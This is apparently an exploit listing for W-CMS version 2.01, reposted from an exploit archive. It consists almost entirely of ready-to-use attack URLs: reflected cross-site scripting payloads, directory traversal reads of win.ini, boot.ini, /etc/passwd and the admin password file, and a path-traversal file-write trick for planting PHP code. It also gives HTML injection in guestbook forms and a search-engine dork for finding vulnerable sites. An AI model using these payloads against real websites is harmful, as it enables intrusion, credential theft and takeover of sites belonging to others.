Exploit for php platform in category web applications
# Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in www.root-team.com www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
W-CMS cross site scripting
_______________
Vulnerable Link __________\/_____________________
_______________
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"
http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>
~ [PoC]Http://[victim]/path/?p=<script>alert('1')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('1')</script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
This script is possibly vulnerable to directory traversal attacks
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../1.php
Just Fill The Text Area With Evil Code (Php) & Click Save
+----------------------------------------------------------------------+
Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle : <H3>Own3d</H3>
++ You Can Inject Xss Too
Exapmle : <script>alert('1')</script>
+----------------------------------------------------------------------+
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net
# 0day.today [2018-02-19] #